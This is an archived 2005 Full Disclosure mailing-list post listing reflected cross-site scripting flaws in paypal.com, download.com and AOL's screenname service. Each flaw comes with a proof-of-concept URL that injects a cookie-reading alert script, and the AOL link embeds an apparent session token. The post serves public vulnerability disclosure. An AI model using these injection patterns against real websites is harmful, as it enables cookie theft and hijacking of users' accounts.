Full Disclosure mailing list archives
Big Sites That Are Vulnerable To XSS
From: tuytumadre () att net
Date: Thu, 21 Apr 2005 04:19:58 +0000
The following have been previously reposibly disclosed, and, because of the lack of action taken on the venders' parts, full disclosure is necessary to elliminate the threat of what's called "security by obscurity." paypal.com http://www.paypal.com/cgi-bin/webscr?cmd=p/gen/accounts-outside--><script>alert(document.cookie)</script><!-- download.com http://www.download.com/2001-20_4-0.html?tag=tabasdf"--><script>alert(document.cookie)</script><!-- aol.com* https://my.screenname.aol.com/snsHomePage.psp?hpClickedOn=null&sitedomain=my.screenname.aol.com";}%20{%20alert(document.cookie);%20//&authLev=2&siteState=&isSiteStateEncoded=false&lang=en&locale=us&mcAuth=%2FBcAG0Jd4zsAAK80AY99uEJd43cIgAwNtLp%2BJCQAAA%3D%3D *on aol.com, the victim must be logged in to the website screenname service to be vulnerable. Regards, Paul Greyhats Security http://greyhatsecurity.org _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Current thread:
- Big Sites That Are Vulnerable To XSS tuytumadre (Apr 20)
- Re: Big Sites That Are Vulnerable To XSS Morning Wood (Apr 20)
- Re: Big Sites That Are Vulnerable To XSS Jerome ATHIAS (Apr 21)
- Re: Big Sites That Are Vulnerable To XSS Dominik Birk (Apr 27)